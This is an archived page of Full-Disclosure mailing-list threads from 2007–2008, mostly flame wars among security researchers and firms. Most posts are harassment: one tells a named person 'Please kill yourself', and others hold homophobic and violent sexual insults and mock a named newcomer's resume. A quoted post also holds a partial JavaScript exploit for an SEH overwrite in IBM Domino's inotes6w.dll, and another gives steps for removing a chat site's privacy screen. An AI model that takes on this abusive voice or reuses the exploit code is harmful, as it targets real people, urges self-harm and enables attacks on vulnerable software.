 nuclear deterrent, without the mutually assured destruction lunacy.

 I have watched the posters to this list for some time. By far the
 vast majority are transparently kiddies, sitting on their painted-
 up laptops thinking of themselves as the techno-brats in the film
 Hackers and hoping to grow up to be like the guy in the film
 Swordfish. They write in l33t5p34k and think that this somehow
 makes them informed. Kiddies are the lowest form of life in the
 hierarchy of information security and in the IT industry generally.

 You know who you are and so does everyone else. You are fools, and
 an embarrassment to the craft:
 Secreview (review of products/services you have never bought, are
 you the goatse.cz receiver?)
 Reepex (Isn't a reepex a bit of farm machinery?)
 Gobbles (A nickname for a gay male prostitute)
 Morning Wood (The holy grail of the viagra-abuser)
 Gmaggro (high value target selection, are you completely cocking
 stupid?)

 Oh, the outrage.

 I can see it now. there will be armies of skiddies demanding that
 the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory
 messages concerning her skills and possible employment
 opportunities for her and her mother everywhere possible. Guess
 what, kids? I don't care.

 No, not even a little bit. Do what you like, I could care less and
 no one else cares if you live or die tonight, you sad, acne'd
 little dewdrops.

 Calmed down yet?

 Good. I want you to consider something.

 The FD list consists of the following content (and what it has to
 say):

 Advisories by vendors (we fixed this)
 Advisories by individuals (I tested that and found this)
 Advisories by infosec organisations (we found this)
 Funnies (self explanatory)
 Opinions (this sucks, what about that?)
 Skids (I did this, aren't I great, everyone else sucks?)
 Trolls (you suck)
 Trawlers (I have something 0day to buy or sell)

 The top three (ie the useful content) is available in any one of a
 hundred places, the bottom three are noise. The only people
 interested in the noise are those who keep track of it for a
 living.

 So, consider that by posting anything in the bottom three
 categories, you are drawing the attention of those who take an
 interest in your sad efforts to destabilise the technical crutch of
 society. These people are better than you in every important way,
 and if you so much as tiptoe across one of their lines, you'll wind
 up sharing a cell with a 7ft gorilla called george with a dead
 mouse and a pressing need to dry-cornhole your ringpiece 3 times a
 night and twice on sundays. Do yourselves a favour and STFU.

 What's left?

 The funnies and the opinions. I've laughed my tits off at posts by
 Messrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and I've
 been interested by a few others who will remain nameless as I can't
 list them all. Long live full disclosure, but keep in mind that
 you're only legends in your own bedrooms.

 later, pi


Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-01 Thread reepex
On Jan 1, 2008 9:04 AM, Adam Muntner [EMAIL PROTECTED] wrote:

 I hsve been pentesting since 98 and nearly nonstop since 2000.


You cannot spell either and you have been a 'pentester' ... does this mean
you ran nessus and other automated testing tools and call yourself a hacker?


 Sent from my iPhone


Please kill yourself

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-01 Thread reepex
You are worthless.

http://www.tssci-security.com/bookshelf/

Is this list up to date?  It makes it seem as if you are learning basic
linux commands, sed, and basic perl. Also why are you reading operating
system design and implementation when you do not know C? ( Seeing as C books
are in your 'to-read' list ).  Do you understand any of the code in it or do
you just pick out buzz words to talk about at your 'local meet-ups'. Why
don't you explain the finer points of microkernel design to us?

You are headed even further down the path of complete lamer seeing as you
read books on XSS and all your blog posts revolve around it.

even more lulz in your 'plan to read' containing books on fuzzing,
metasploit, and writing rootkits. How can you write rootkits when you do not
know C and are learning basic unix commands?... lol

Hopefully one day you realize that you are just another security industry
kiddie and have no real knowledge, but probably not. Seeing as you have your
'bachelors' ( lol - has nothing to do with security ) - I am sure you are
well on your way to a cissp.

Also for a good laugh people should read:

http://www.tssci-security.com/projects/

how long did it take you to write all 40 lines of your 'labs' code? I shall
notify perl underground of your horrendous perl and you shall be a source
of great lulz in their next production.

Just found this:
http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
So you worked 4 places and did nothing useful. Sounds like Simon may want to
hire you. ( Hi simon , are your workers still inadequate and you need more
help? )

So basically you have worked 4 jobs, went to a community college that has
some sort of security program, you know basic perl and C, do not know how to
audit any real programs, and blog about XSS.   Does this summarize you
pretty well?



On Jan 1, 2008 10:57 AM, Marcin Wielgoszewski [EMAIL PROTECTED] wrote:

 Marcin Wielgoszewski here, the green consultant you mentioned but
 chose not to focus on.  I'm not sure what you mean by green, but
 whatever.  I have just finished my bachelor's degree, have done
 internships with some Fortune-100's and I am constantly doing research
 on my own.  I also make an effort to attend every conference and local
 meet-up.  I have my own blog I started at http://www.tssci-security.com,
 you can read and learn more about me.

 Onto QuietMove and Adam Muntner...  QuietMove was founded by Adam and
 the other two folks you mention.  I have done some part-time work with
 Adam over the past couple months while finishing up my last semester.
 Adam knows this industry inside-out, and one of only several people I
 would say really knows his stuff.  I'm sorry the website doesn't have an
 infosec glossary of terms for you to study for your Security+.  I guess
 looking on LinkedIn and the website passes off as research nowadays.
 Couldn't you have at least used Maltego to look deeper into this?  I was
 actually going to make a post about how pathetic the research some
 people have tried to pass off lately in security, and no one, except for
 a few have called anyone out on it.

 Some security consulting firms you would give a higher score are some of
 the firms we've picked up where traceroute, whois and their nmap
 scanners left off.


Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-01 Thread reepex
your attitude sure has changed since your last post. Maybe you shouldn't
sound so commanding on a real list next time and instead stick to your local
2600 meetings.

On Jan 1, 2008 1:08 PM, Marcin Wielgoszewski [EMAIL PROTECTED] wrote:

 You're right. I'm new and young and I'll be the first to admit it. We
 can't all be born security gurus, and I'm not trying to hide that, but
 me aside... what have you done besides hide behind your gmail account
 and troll FD?

 Thanks for pointing out those two pages, two pages out of 100's that
 were posted a long time ago and yes, are very out of date.

 On Jan 1, 2008 1:33 PM, reepex [EMAIL PROTECTED] wrote:
  You are worthless.
 
  http://www.tssci-security.com/bookshelf/
 
  Is this list up to date?  It makes it seem as if you are learning basic
  linux commands, sed, and basic perl. Also why are you reading operating
  system design and implementation when you do not know C? ( Seeing as C books
  are in your 'to-read' list ).  Do you understand any of the code in it or do
  you just pick out buzz words to talk about at your 'local meet-ups'. Why
  don't you explain the finer points of microkernel design to us?
 
  You are headed even further down the path of complete lamer seeing as you
  read books on XSS and all your blog posts revolve around it.
 
  even more lulz in your 'plan to read' containing books on fuzzing,
  metasploit, and writing rootkits. How can you write rootkits when you do not
  know C and are learning basic unix commands?... lol
 
  Hopefully one day you realize that you are just another security industry
  kiddie and have no real knowledge, but probably not. Seeing as you have your
  'bachelors' ( lol - has nothing to do with security ) - I am sure you are
  well on your way to a cissp.
 
  Also for a good laugh people should read:
 
  http://www.tssci-security.com/projects/
 
  how long did it take you to write all 40 lines of your 'labs' code? I shall
  notify perl underground of your horrendous perl and you shall be a source
  of great lulz in their next production.
 
  Just found this:
  http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
  So you worked 4 places and did nothing useful. Sounds like Simon may want to
  hire you. ( Hi simon , are your workers still inadequate and you need more
  help? )
 
  So basically you have worked 4 jobs, went to a community college that has
  some sort of security program, you know basic perl and C, do not know how to
  audit any real programs, and blog about XSS.   Does this summarize you
  pretty well?
 


Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-01 Thread reepex
So what exactly do you do then?  Please explain your skills to us since you
conveniently avoided my questions about your metasploit and auto hacking
skills.

On Jan 1, 2008 1:33 PM, Adam Muntner [EMAIL PROTECTED] wrote:

 That would be an incorrect assumption. As I mentioned in the followup
 email - I typed my response on my phone's touchscreen, on a moving train.

 D- on your reading comprehension skills.

 F on your need to diss, anonymously.

 F- on if there is such a thing based on your suggestion of suicide for my
 choice in cell phone. Save your allowance and maybe you could buy one, too.

 I will stand by my words. I sign my name to them. Though, based on the
 content and quality of your posts, I see why you won't.

 Adam Muntner
 Managing Partner
 QuietMove, Inc.
 http://www.quietmove.com

 Sent from my iPhone

 On Jan 1, 2008, at 1:12 PM, reepex [EMAIL PROTECTED] wrote:

 On Jan 1, 2008 9:04 AM, Adam Muntner  [EMAIL PROTECTED]
 [EMAIL PROTECTED] wrote:

  I hsve been pentesting since 98 and nearly nonstop since 2000.
 

 You cannot spell either and you have been a 'pentester' ... does this mean
 you ran nessus and other automated testing tools and call yourself a hacker?



  Sent from my iPhone
 

 Please kill yourself



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-01 Thread reepex
On Dec 31, 2007 9:36 PM, Andre Gironda [EMAIL PROTECTED] wrote:

 Sites such as PullThePlug, HackThisSite, etc all borrowed ideas from
 UPT,


what exactly was borrowed? because I am pretty sure none of the hackthissite
founders were around when this magazine was.


 There are few PCI ASV's or penetration testing companies that I would find
 any value in -- and QuietMove exceeds my expectations in this area.


what are their methods? No one has answered that yet.. I imagine being a
small company they must rely on a lot of automated testing due to time/man
power restraints

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-01 Thread reepex
On Jan 1, 2008 9:53 PM, Andre Gironda [EMAIL PROTECTED] wrote:

 I wouldn't do a direct comparison, but I thought UPT was more about being
 funny than being seriously challenging.


ok so they are nothing alike because ptp/hts actually teach you stuff while
UPT was for jokes... so your post was stupid


 Look, you rated Denim Group as A-.  You must either work there - or
 know the guys.  Dan Cornell is a moron compared to Adam Muntner - and
 his code is certainly worse (e.g. Sprajax).


I am not a part of secreview but I realize following email threads is very
complicated for you.


 Adam and team know Burp Suite, use manual web application testing - in
 addition to traditional dynamic and static analysis.

 I have seen Adam and crew using Fortify Software's SCA and Tracer
 tools.  I have seen them using Hailstorm ARC and modifying the
 Javascript included in the SmartAttack library.  I would call this a
 best-of-breed security testing methodology.


So you list 5 tools they use then mention they modify a javascript
library...  So basically they use automated tools and  are former  web
developers ... sound pretty hardcore


 More people will read mine than anything you do -- and with my name on it
 -- they are certainly bound to take it a lot more seriously.


You must be a cissp because you take yourself and the internet very
seriously. I am pretty sure no one cares about your opinion either.

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-01 Thread reepex
On Jan 1, 2008 9:35 PM, SecReview [EMAIL PROTECTED] wrote:

 QuietMove has not provided us with any information that contradicts
 anything that we've written in our original post. We're still
 waiting for answers back from them.


It is probably because they, like everyone else, do not care about your
opinion.

Re: [Full-disclosure] IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite Exploit

2007-12-31 Thread reepex
seh overwrites are the new <script>alert(document.cookie)</script> ?

On Dec 31, 2007 8:55 AM, [EMAIL PROTECTED] wrote:

 This one is the same offset as dwa7w and the same class id as
 inotes6. Basically inotes6 and inotes6w share the same class id,
 except that inotes6w is unicode. dwa7w is unicode and has a
 different class id. Code is inline, I would attach it except for
 the fact that I set off way too many av scanners with my last
 messages.

 -
 !--
 written by e.b.
 IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite
 Exploit
 CVE-2007-4474
 Tested on Windows XP SP2(fully patched) English, IE6, inotes6w.dll
 version 6.0.48.0
 Thanks to h.d.m. and the Metasploit crew
 --
 html
  head
  titleIBM Domino Web Access Upload Module inotes6w.dll SEH
 Overwrite Exploit/title
  script language=JavaScript defer
function Check() {

 var buf = unescape(%u4141);
 while (buf.length = 2461) buf = buf + unescape(%u4141);


 // win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe
 Size=378 Encoder=Alpha2 http://metasploit.com

 // win32_bind -  EXITFUNC=seh LPORT= Size=696 Encoder=Alpha2
 http://metasploit.com


var next_seh_pointer = unescape(%u06EB%u9090); //2 byte jump

//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis
  

Re: [Full-disclosure] iFriends free video chat exploit

2007-12-28 Thread reepex
your profanity is not appreciated. If you are going to troll at least think
of something original and/or clever.

On Dec 28, 2007 6:37 PM, damncon [EMAIL PROTECTED] wrote:

 SHUT THE FUCK UP VALDIS

 On Dec 28, 2007 7:51 PM, [EMAIL PROTECTED] wrote:
 
  On Fri, 28 Dec 2007 16:09:23 CST, Ifriends Exploit said:
 
   If you don't have an iFriends account, and do not wish to get one, find a
   chathost utilizing EasyCam, and enter their Guest Chatroom, follow the steps
   above, except look for a file named LSChatViewG.swf instead... this is the
   flash file for guest chats. Once you've downloaded this file, you'll need to
   use a Flash decompiler to decompile this file, and then delete the privacy
   screen and recompile it.
 
  Gaak. ;)
 
  Remember kiddies - friends don't let friends deploy systems that depend on
  untrusted end hosts to do validation of critical information for them... ;)
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fwd: beyond security sucks at coding

2007-12-28 Thread reepex
In case you missed it before

-- Forwarded message --
From: reepex [EMAIL PROTECTED]
Date: Dec 23, 2007 8:22 PM
Subject: beyond security sucks at coding
To: full-disclosure@lists.grok.org.uk, Gadi Evron [EMAIL PROTECTED]


http://www.milw0rm.com/exploits/4773

Gadi and Noam Rathaus and the crew suck at coding once again.

From the exploit:

 my $ciphers = ;
 my $ciphers_length = pack('n', length($ciphers));

 my $certificate = ;
 my $certificate_length = pack('n', length($certificate));

I think the italian Phd students can write better perl than this.

You have to give it to Gadi and friends though spending the last year (
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-4343 Original release
date: 9/28/2006 ) writing this complex exploit and testing it to work
on all platforms ever created.
Noam's inability to code now shows me why all his books (
http://www.amazon.com/s?ie=UTF8search-type=ssindex=booksfield-author=Noam%20Rathauspage=1)
are basic extensions and ripoffs of other peoples' code and why he
contributes nothing original or useful.

I guess to work at beyond security you must be a master in the art of
copy/paste, stealing code, and bullshitting technical knowledge
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows

2007-12-27 Thread reepex
I believe I have contributed greatly to the security community with my post
here. Not only have I denied another 0x41414141 hacker but I have also made
Valdis have to backtrack on his ( as usual) stupid post. I believe Valdis
and Billy O Reilly have alot in common. ( 
I was wrong. I am not pleased about it at all and I think all Americans
should be concerned about this…What do you want me to do, go over and kiss
the camera? ).

On Dec 27, 2007 9:05 AM, Elazar Broad [EMAIL PROTECTED] wrote:

 After some more analysis by Carsten Eiram @ Secunia, this is NOT
 exploitable. I would like to apologize for the hasty post. SecurityFocus,
 please update bid 27026 to reflect the fact that at most, this can just
 crash the browser.

 Elazar

 -Original Message-
 From: [EMAIL PROTECTED]
 Sent: Dec 26, 2007 1:28 AM
 To: reepex [EMAIL PROTECTED]
 Cc: Elazar Broad [EMAIL PROTECTED],
 full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple
 Buffer Overflows
 
 On Tue, 25 Dec 2007 21:53:29 CST, reepex said:
 
  How does a bunch of 'A's prove something is exploitable?
 
 If a bunch of A's causes the EIP to end up as x'41414141', it's 95% of the
 way to being an exploit.  If it gets you some *other* crash, it's probably
 at least 30% to 40% of the way to an exploit.
 
 Go back and read the analysis of the NTP buffer overflow from a number of years
 back.  Truly a classic - they managed to leverage a *one byte* overflow into
 a complete and total rooting of the box.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows

2007-12-25 Thread reepex
On Dec 25, 2007 5:29 PM, Elazar Broad [EMAIL PROTECTED] wrote:

 The AOL YGP Picture Editor Control (AIM PicEditor Control) version 9.5.1.8
 suffers from multiple exploitable buffer overflows in various properties.
 This object is marked safe for scripting. I have not tested other versions.
 PoC as follows:



How does a bunch of 'A's prove something is exploitable?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] beyond security sucks at coding

2007-12-23 Thread reepex
http://www.milw0rm.com/exploits/4773

Gadi and Noam Rathaus and the crew suck at coding once again.

From the exploit:

 my $ciphers = ;
 my $ciphers_length = pack('n', length($ciphers));

 my $certificate = ;
 my $certificate_length = pack('n', length($certificate));

I think the italian Phd students can write better perl than this.

You have to give it to Gadi and friends though spending the last year (
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-4343 Original release
date: 9/28/2006 ) writing this complex exploit and testing it to work
on all platforms ever created.
Noam's inability to code now shows me why all his books (
http://www.amazon.com/s?ie=UTF8search-type=ssindex=booksfield-author=Noam%20Rathauspage=1)
are basic extensions and ripoffs of other peoples' code and why he
contributes nothing original or useful.

I guess to work at beyond security you must be a master in the art of
copy/paste, stealing code, and bullshitting technical knowledge
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] hey irmplc

2007-12-22 Thread reepex
when should we expect more ground breaking 0day from you and your company?
We wouldn't want to keep Cisco complacent for too long
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] For Christmas..

2007-12-20 Thread reepex
if this happened all FD members would go broke because they are kiddies who
rely on automated tools for everything

On Dec 19, 2007 3:59 PM, gmaggro [EMAIL PROTECTED] wrote:

 ..it would be a nice touch if everyone sent a few dollars to the
 projects or authors of the security tools they use. I have donated a bit
 already to some of my favourites, but I'm only one person. Alot of folks
 have worked hard to bring us some good shit, let's give a little back.
 In fact, let's give alot more back then we have been doing, collectively
 (ugh) speaking.

 Think of it as enlightened self-interest; helping these folks out makes
 it far more likely you'll see even more good stuff from them in the
 future.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Cybertrust ( C + )

2007-12-20 Thread reepex
nothing don ever does is useful or funny

On Dec 20, 2007 2:14 PM, SecReview [EMAIL PROTECTED] wrote:

 Don, the original poster is anonymous so it's not actually that
 funny.


 On Thu, 20 Dec 2007 14:59:01 -0500 don bailey
 [EMAIL PROTECTED] wrote:
 SecReview wrote:
  Awesome,
  ... would you be willing to
  answer a few questions that we have so that we can revise our
 post?
  ... and we'd keep you anonymous.
 
 
 This is the most comedic statement on full disclosure this month.
 I, too, will ask you publicly for information that I will then
 say is completely anonymous when I repost.
 
 D
 Regards,
  The Secreview Team
  http://secreview.blogspot.com

  Professional IT Security Service Providers - Exposed


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDefense Security Advisory 12.17.07: Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Vulnerability

2007-12-18 Thread reepex
lulz ... nice find

maybe Gadi Evron can publish his first exploit now

On Dec 18, 2007 12:25 PM, iDefense Labs [EMAIL PROTECTED] wrote:

 iDefense Security Advisory 12.17.07
 http://labs.idefense.com/intelligence/vulnerabilities/
 Dec 17, 2007

 I. BACKGROUND

 The mount_smbfs utility is used to mount a remote SMB share locally. It
 is installed set-uid root, so as to allow unprivileged users to mount
 shares, and is present in a default installation on both the Server and
 Desktop versions of Mac OS X. For more information visit the following
 URL.


 http://developer.apple.com/documentation/Darwin/Reference/ManPages/man8/mount_smbfs.8.html

 II. DESCRIPTION

 Local exploitation of a stack based buffer overflow vulnerability in
 Apple Inc.'s Mac OS X mount_smbfs utility could allow an attacker to
 execute arbitrary code with root privileges.

 The vulnerability exists in a portion of code responsible for parsing
 command line arguments. When processing the -W option, which is used to
 specify a workgroup name, the option's argument is copied into a fixed
 sized stack buffer without any checks on its length. This leads to a
 trivially exploitable stack based buffer overflow.

 III. ANALYSIS

 Exploitation of this vulnerability results in the execution of arbitrary
 code with root privileges. In order to exploit this vulnerability, an
 attacker must have execute permission for the set-uid root mount_smbfs
 binary.

 IV. DETECTION

 iDefense has confirmed the existence of this vulnerability in Mac OS X
 version 10.4.10, on both the Server and Desktop versions. Previous
 versions may also be affected.

 V. WORKAROUND

 Removing the set-uid bit from the mount_smbfs binary will prevent
 exploitation. However, non-root users will be unable to use the
 program.

 VI. VENDOR RESPONSE

 Apple addressed this vulnerability within their Mac OS X 2007-009
 security update. More information is available at the following URL.

 http://docs.info.apple.com/article.html?artnum=307179

 VII. CVE INFORMATION

 The Common Vulnerabilities and Exposures (CVE) project has assigned the
 name CVE-2007-3876 to this issue. This is a candidate for inclusion in
 the CVE list (http://cve.mitre.org/), which standardizes names for
 security problems.

 VIII. DISCLOSURE TIMELINE

 07/16/2007  Initial vendor notification
 07/17/2007  Initial vendor response
 12/17/2007  Coordinated public disclosure

 IX. CREDIT

 This vulnerability was discovered by Sean Larsson of VeriSign iDefense
 Labs.

 Get paid for vulnerability research
 http://labs.idefense.com/methodology/vulnerability/vcp.php

 Free tools, research and upcoming events
 http://labs.idefense.com/

 X. LEGAL NOTICES

 Copyright (c) 2007 iDefense, Inc.

 Permission is granted for the redistribution of this alert
 electronically. It may not be edited in any way without the express
 written consent of iDefense. If you wish to reprint the whole or any
 part of this alert in any other medium other than electronically,
 please e-mail [EMAIL PROTECTED] for permission.

 Disclaimer: The information in the advisory is believed to be accurate
 at the time of publishing based on currently available information. Use
 of the information constitutes acceptance for use in an AS IS condition.
  There are no warranties with regard to this information. Neither the
 author nor the publisher accepts any liability for any direct,
 indirect, or consequential loss or damage arising from use of, or
 reliance on, this information.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
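
The workaround in the quoted advisory (removing the set-uid bit) can be audited and applied as below. This is an added example, not part of the advisory or the thread; the file names in `demo()` are constructed and the binary's real path is left to the caller.

```python
import os
import stat
import tempfile


def is_setuid_for(mode, uid, owner_uid=0):
    """True when a regular file carries the set-uid bit and belongs to owner_uid."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == owner_uid


def find_setuid(paths, owner_uid=0):
    """Return the paths that are set-uid and owned by owner_uid (root by default)."""
    hits = []
    for path in paths:
        try:
            st = os.lstat(path)  # lstat: do not follow a symlink to another binary
        except OSError:
            continue  # missing or unreadable entries are skipped, not fatal
        if is_setuid_for(st.st_mode, st.st_uid, owner_uid):
            hits.append(path)
    return hits


def strip_setuid(path):
    """Clear only the set-uid bit, as the workaround describes; return the new mode.

    After this, non-root users can no longer use the program's privileged
    function, which is the trade-off the advisory states.
    """
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        raise ValueError("refusing to chmod a non-regular file: %s" % path)
    new_mode = stat.S_IMODE(st.st_mode) & ~stat.S_ISUID
    os.chmod(path, new_mode)
    return new_mode


def demo():
    """Run the audit on constructed files owned by the current user."""
    with tempfile.TemporaryDirectory() as d:
        suid = os.path.join(d, "mount_helper")   # constructed stand-in binary
        plain = os.path.join(d, "plain_tool")    # constructed control file
        for p in (suid, plain):
            open(p, "w").close()
        os.chmod(suid, 0o4755)
        os.chmod(plain, 0o755)
        me = os.getuid()  # the demo cannot create root-owned files
        before = find_setuid([suid, plain, os.path.join(d, "missing")], owner_uid=me)
        mode_after = strip_setuid(suid)
        after = find_setuid([suid, plain], owner_uid=me)
        return [os.path.basename(p) for p in before], oct(mode_after), after


if __name__ == "__main__":
    print(demo())
```
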

Re: [Full-disclosure] Sendmail/Postfix Storybook

2007-12-15 Thread reepex
So a kid posts his first found exploit to every mailing list and you are
going to bash him?  If you scare him off or discourage him then we won't get
code and screenshots from his future high-risk 0day.

On Dec 15, 2007 7:29 AM, fabio [EMAIL PROTECTED] wrote:

 wtf? remote exploit? you need an user account and all you get is.. a
 command executed by the same user account. Isn't easier just to login on
 the box?

 CtrlAltCa


 kcope wrote:
  Look, it's the Sendmail/postfix the Storybook
 
 
 
  
 
 
  
 
 
  
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE

2007-12-15 Thread reepex
this kid spent many hard hours reading man pages looking for 0day, gives it
to us along with hello world python networking code ( that is incapable of
parsing replies so any unintended behaviour causes exit), and you are going
to bash it?  You are probably just jealous you do not have the technical
ability required to find these types of vulnerabilities and write reliable
remote exploits for them.

On Dec 14, 2007 3:11 PM, [EMAIL PROTECTED] wrote:

 On Fri, 14 Dec 2007 13:52:33 CST, Adam N said:

  No, the idea is that you are a user with no login access, only FTP.
  By doing this, you get shell access (with sane privileges, thankfully) when
  you're supposed to only have FTP.

 And this is why, for at least 2 decades, it's been recommended that people
 doing the FTP-only user put the writeable directories for that user under
 ~ftp/$USER or some such, rather than ~$USER, and make the login shell for the
 user /bin/false, and other such things.

 For bonus points - if it's an FTP-only userid, why does the sysadmin not
 have e-mail for the userid *blocked*? After all, if they can't login, they
 can't *read* any mail that gets delivered to the system. Even if you fix
 the MTA to drop mail directly in $HOME/mbox, it's the rare FTP daemon that
 understands the locking needed to make this work - that's the primary
 reason why the POP protocol was invented.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
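
The FTP-only account recommendations quoted in the message above (home under ~ftp/$USER, login shell /bin/false, mail blocked for the userid) can be checked against a passwd file as follows. This is an added example, not code from the thread; the sample passwd content, the account names and the `mail_blocked` set (how mail is blocked is MTA-specific) are constructed assumptions.

```python
import posixpath

# Constructed sample in passwd(5) layout: name:pw:uid:gid:gecos:home:shell
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
ftp:x:14:50:FTP User:/home/ftp:/bin/false
alice:x:1001:1001::/home/ftp/alice:/bin/false
bob:x:1002:1002::/home/bob:/bin/bash
carol:x:1003:1003::/home/ftp/../carol:/bin/false
"""


def parse_passwd(text):
    """Map account name to its home directory and login shell."""
    accounts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry: ignore rather than guess
        accounts[fields[0]] = {"home": fields[5], "shell": fields[6]}
    return accounts


def home_is_under(home, base):
    """Compare normalized paths so '/home/ftp/../x' does not pass as under ~ftp."""
    norm = posixpath.normpath(home)
    base = posixpath.normpath(base)
    return norm == base or norm.startswith(base + "/")


def audit_ftp_only(passwd_text, ftp_only_users, mail_blocked,
                   ftp_account="ftp", nologin_shells=("/bin/false",)):
    """Return (user, finding) pairs for accounts that break the recommendations."""
    accounts = parse_passwd(passwd_text)
    if ftp_account not in accounts:
        raise ValueError("no passwd entry for the %r account" % ftp_account)
    ftp_home = accounts[ftp_account]["home"]
    findings = []
    for user in ftp_only_users:
        entry = accounts.get(user)
        if entry is None:
            findings.append((user, "no-passwd-entry"))
            continue
        if entry["shell"] not in nologin_shells:
            findings.append((user, "login-shell"))       # can obtain a shell
        if not home_is_under(entry["home"], posixpath.join(ftp_home, user)):
            findings.append((user, "home-outside-ftp"))  # writes land in ~$USER
        if user not in mail_blocked:
            findings.append((user, "mail-accepted"))     # mail still delivered
    return findings


if __name__ == "__main__":
    users = ["alice", "bob", "carol", "dave"]
    for user, issue in audit_ftp_only(SAMPLE_PASSWD, users, {"alice", "carol"}):
        print(user, issue)
```
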

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Cyberklix ( F+ )

2007-12-15 Thread reepex
I have been following your blog alot and think the idea is really awesome
but this one line...

On Dec 13, 2007 2:23 PM, secreview [EMAIL PROTECTED] wrote:

 true Ethical Hacker talent.


Was this meant to be humorous? You realize that 'ethical hacker' ( as in the
certification) is a bunch of X geek squad guys running nmap and nessus
waiting for the last day where they learn about the coveted Stack
Overflow?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-13 Thread reepex
so are you now admitting your vulnerability was worthless?

On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote:

 im so hurt now... you make me feel so small compared to your great worx
 MrReepass
 stfu kthnx


 - Original Message -
 From: reepex [EMAIL PROTECTED]
 To: Morning Wood [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Wednesday, December 12, 2007 9:01 PM
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow
 Vulnerability


  wow thats quite impressive.. you couldnt exploit a basic overflow and two
  years later someone else did
 
  you must be quite proud. Did you tell your family and co workers about this
  great finding? I hear tipping point and idefense are hiring you should
  forward them this set of emails.
 
  On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:
 
  One of my first advisories and was rediscovered later, turned into a viable
  exploit 2 years after by another researcher.
 
 
 
 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user
 
 
 
 http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77
 
  *hugz*
 
 
  - Original Message -
  From: reepex [EMAIL PROTECTED]
  To: Morning Wood [EMAIL PROTECTED];
  full-disclosure@lists.grok.org.uk
  Sent: Tuesday, December 11, 2007 1:58 PM
  Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow
  Vulnerability
 
 
   are you serious?
  
  
 
 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
  
   I guess you are a 'brain dead india wannabe sec researcher' also?
  
  
   On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:
  
   advisories like this are typical of brain dead India wannabe sec researchers
   nuff said
  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
